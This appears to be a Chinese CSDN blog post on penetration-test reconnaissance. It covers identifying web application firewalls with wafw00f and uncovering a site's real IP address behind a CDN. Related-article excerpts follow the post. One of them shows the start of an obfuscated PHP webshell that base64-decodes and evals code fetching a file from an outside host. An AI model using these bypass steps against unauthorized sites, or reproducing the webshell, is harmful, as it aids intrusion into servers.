waf、CDN信息收集

最新推荐文章于 2025-03-03 16:38:34 发布
最新推荐文章于 2025-03-03 16:38:34 发布
阅读量778 收藏
点赞数 1
分类专栏: 网络安全工具 文章标签: 服务器 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45785324/article/details/127987526
版权

一、waf指纹的识别

kali系统中自带的wafw00f,若自定义安装wafw00f:git clone GitHub - EnableSecurity/wafw00f: WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.

用法: wafw00f  url路径

案例: wafw00f http://www.washun.com       

               

二、CDN,内容分发网络

CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。主要作用是改善网站加载时间、减少服务器负载、降低成本,提高网站安全性。

1.如何判断一个网站使用了CDN加速功能?

在不同的地区(最好距离较远)ping该站点FQDN,假如回应的地址是一致的。那么可以断定没有使用CDN。假如回应地址是不一致的,基本可以断定该站点使用了CDN加速功能。

使用站长工具的ping检测,https://ping.chinaz.com

 2.如何绕过CDN找到真实IP地址?

   1)通过查询历史DNS记录

iphistory:https://viewdns.info/iphistory/

DNS查询:https://dnsdb.io/zh-cn/

微步在线:https://x.threatbook.cn/

域名查询:https://site.ip138.com/

DNS历史查询:https://securitytrails.com/

Netcraft:https://sitereport.netcraft.com/?url=github.com

   2)查找子域名

子域名一般不会使用CDN,并且子域名一般跟主域名在同一个C段内。

   3)网站的邮件系统查找真实IP地址

通过站点的邮件系统给自己的其他邮箱发送邮件,使对方暴露真实IP地址

   4)通过ssl证书识别真实IP地址

证书颁发机构(CA)必须将他们发布的每个SSL/TLS证书发布到公共日志中,SSL/TLS证书通常包含域名、子域名和电子邮件地址。

   5)通过国外的DNS解析获得真实IP地址

大部分站点只做了国内的CDN加速,而没有使用国际CDN。

国外的ping检测工具

https://asm.ca.com/zh_cn/ping.php

http://host-tracker.com/

http://www.webpagetest.org/

https://dnscheck.pingdom.com/

   6)通过CDN配置问题绕过CDN,从而获得真实IP

https配置CDN,http没有配置,这样就可以通过http访问站点,或者真实IP。

   7)cdn识别工具

用来尝试找出站点的真实IP地址

运行环境:kali

安装:  git clone https://github.com/3xp10it/xcdn.git

用法: sudo  python3 xcdn.py www.baidu.com

Kali linux——信息收集(linux常用命令、域名信息、ip信息、指纹信息CDN、CMS和WAF)
m0_61506558的博客
07-31 1049
让在各个不同的地方的网络用户,都可以快速访问网站内容。根据关键特征,识别程序名称、版本等信息1、CMS信息比如Discuz、织梦、帝国CMS、PHPCMS、ECshop等;2、前端技术比如HTML5、jquery、bootstrap、Vue、ace等;3、开发语言比如PHP、Java、Ruby、Python、C#等;4、Web服务器比如Apache、Nginx,、IIS、lighttpd等;5、应用服务器CDN信息WAF信息类型硬件型WAFWAF。......
红队攻防渗透技术实战流程:红队目标信息收集之目标域名CDN绕过
HACKONE的博客
03-24 369
CDN的全称是Content Delivery Network(内容分发网络),通过在网络各处的加速节点服务器来为网站抵挡恶意流量,把正常流量进行转发。用简单点的话来说,CDN一般有三个作用:1.跨运营商加速:我们自己的网站常常只属于一个运营商(比如:电信),而加速节点遍布每家运营商,于是和网站不同运营商(比如:联通)的用户访问起来就不会那么慢了。
信息收集之——CDN(内容分发网络)
JieDG的博客
05-13 660
真实IP地址查询 在渗透测试过程中,目标服务器可能只有一个域名,那么如何通过这个域名来确定目标服务器的真实IP对渗透测试来说就很重要。如果目标服务器不存在CDN可以同通过以下地址进行查询,也可以通过nslookup等获取IP及域名信息。 http://www.ip138.com/ 假如目标存在CDN服务器呢?我们需要找到目标真实的服务器的IP。 1.什么是CDN CDN就是内容分发网络,主要解决因传输距离和不同运营商节点造成的网络速度性能低下的问题。说的简单点,就是一组在不同运营商之间的对接节点上的高速缓存
阿里云CDN上线 WAF,一站式提供分发+安全能力
chikuai9995的博客
08-20 363
CDN是业界公认的加速网站访问效率、提升用户体验的内容分发加速产品。Gartner预测2019年超过50%的互联网流量将通过CDN内容分发网络进行加速。 然而,越来越多企业也意识到恶意网络攻击对非凡用户体验构成的威胁,因为网络攻击对网站/应用性能、业务数据安全的影响远超其他因素。根据Gema...
认识WAFCDN
qq_54694921的博客
12-01 909
WAF(WebApplicationFirewall),Web应用防护系统,也称为网站应用级入侵防御系统。 CDN(Content Delivery Network),内容分发系统,通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络。
常用CDN收集
疯狂的简洁
03-22 982
说明 记录一些CDN 七牛云 ( 支持HTTPS) Bootstrap 中文网开源项目免费 CDN 加速服务(库比较新,建议使用) 开放静态文件 CDN 又拍云JS库 http://jscdn.upai.com/ (常用JavaScript库CDN服务) BootstrapCDN https://www.bootstrapcdn.com/ ...
信息收集-CDN
m0_48907714的博客
03-26 4607
信息收集-CND
网络安全中的系统信息收集与防护机制探讨
11-17
主要分为三大板块:获取网络和服务信息的方法、克服CDNWAF等障碍的技术手段。其中包括对服务厂商、网络架构的理解,对于协议应用、内部网络设备的认识,以及面对各种安全措施如CDN服务、负载均衡器、Web应用防火墙...
内容分发网络CDN、动态内容缓存简介
lonelymanontheway的博客
11-19 1413
CDN概述、核心功能、优势、不足、应用场景、原理、流程、架构、技术、CDN回源、CDN与ICP、CDN与DNS、CDN与ISP、动态内容缓存、DCDN、供应商、接入、成本与优化、未来;
-V2024 2.信息收集结束
最新发布
04-10
通过这些方法,我们可以有效地发现隐藏的js文件和敏感信息,例如在配置CDNWAF(Web应用防火墙)时,我们可能会遇到一些开放的端口,这些端口有可能被恶意利用。 信息收集是一项复杂且细致的工作,需要我们具备...
信息收集(1)CDN
weixin_43954246的博客
02-19 763
文章目录什么是CDN如何判断目标存在CDN服务 什么是CDN CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。但在安全测试过程中,若目标存在CDN服务,将会影响到后续的安全测试过程。 如何判断目标存在CDN服务 1.可以访问http://ping.chinaz.com/,他会借助全国各
在选用CDN高防服务时要不要带waf功能呢?知道这些知识点让你不“踩雷”
lw1207的博客
02-03 534
首先CDN高防是通过广泛分布的CDN节点和节点之间的智能冗余机制来进行网络攻击防御,主要分为四点:CDN节点一般是用户最先接近的服务器端,源服务器是隐藏并被保护在后面,网络攻击者首先攻击的是CDN节点。在节点被攻击的时候,CDN就会启动自动清洗过滤的功能,有效地保护了源服务器;用户可以把网站域名解析到CDN自动生成的CNAME记录值上,网站的IP地址就隐藏在公网上,网络攻击者就不会知道网站的真实IP信息,也就无法进行网络攻击了;CDN高防节点是部署在各个地方,能够使用户迅速的链接上最近的节点,达到快速的访问
防火墙、CDNWAF等防御CC攻击的几种方式
Enweitech Software Works
08-30 8736
一,防御方式  1)JavaScript方式输出入口  演示可以看下面这张图:    第一次访问的时候,不是直接返回网页内容,而且返回这段JS程序。  作用就是计算出入口变量的值,然后在访问的网址后面加上类似于”?jdfwkey=hj67l9″的字串,组合成新的网址,然后跳转,当防火墙验证了jdfwkey的值(hj67l9)是正确的之后,就放行,一段时间内就不会再出这个判断程序的页面。 
3-Web 安全与优化技术深度解析:WAFCDN、OSS、反向代理与负载均衡
m0_70346880的博客
03-03 1133
摘录小迪安全
华为云CDN加速WAF防护资源实践
HWCloudDeveloper的博客
03-24 5506
前提条件 已经按照域名准入要求准备好需要接入的域名和华为云账号。 已购买WAF。 已开通CDN服务。 背景信息 CDN是构建在现有互联网基础之上的一层智能虚拟网络,通过在网络各处部署节点服务器,实现将源站内容分发至所有CDN节点,使用户可以就近获得所需的内容,所以接入CDN的网站都能有比较快的响应速度。 Web应用防火墙(WAF:Web Application Firewall),通过对HTTP(S)请求进行检测,识别并阻断SQL注入、跨站脚本攻击、网页木马上传、命令/代码注入、文件包含、敏感文件访问、
2018最新过全WAF/CDN/D盾/安全狗小马Or大马
IT界迷者Blog--
10-17 3471
2018最新过全WAF/CDN/D盾/安全狗小马Or大马 首先感谢土司大佬:Math_random 上代码—注意菜刀链接密码为:ximcx <?php $x="BaSe64"; $b="_deCOde"; $c=$x.$b; eval($cc = $c('JGhhbmRsZSA9IGZvcGVuKCdodHRwOi8veGltY3guY24vMi50eHQnLCAncicpOw0KICA...
web页面解析流程及其相关知识(http、https、cdnwaf
iO快到碗里来
07-30 2406
Web 页面解析的流程 理解 web 页面解析的过程,总结其中涉及的基础知识和可能存在的安全问题。 Web 页面解析的总体流程 客户端(浏览器)发起页面请求,主机对 地址中的DNS 域名进行解析,找到对应的 IP 地址,请求发送到 服务端,服务器根据请求内容发送响应给客户端,客户端收到响应,将内容渲染成网页。 Apache请求处理循环讲解: 1、Post-Read-Request阶段: 在正常请求处理流程中,这是模块可以插入钩子的第一个阶段。对于那些想很早进入处理请求的模块来说,这个阶段可以被利用。 2、
Waf攻防-信息收集&漏洞发现&漏洞利用&权限控制
m0_65336233的博客
11-09 1722
简单的介绍了信息收集、漏洞发现、漏洞利用和权限控制等waf绕过
WAFCDN:运用区别与运用范围
weixin_68778384的博客
04-10 711
WAF注重安全防护,CDN注重内容分发和性能优化
解释CDN组成
03-08
接下来,我需要将这些信息结构化,分点解释每个组成部分,并正确添加引用。例如,节点服务器部分引用[3],内容管理系统引用[4],路由系统引用[3]中的智能调度系统,监控系统引用[1]和[2]中的流量导流和质量保障。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值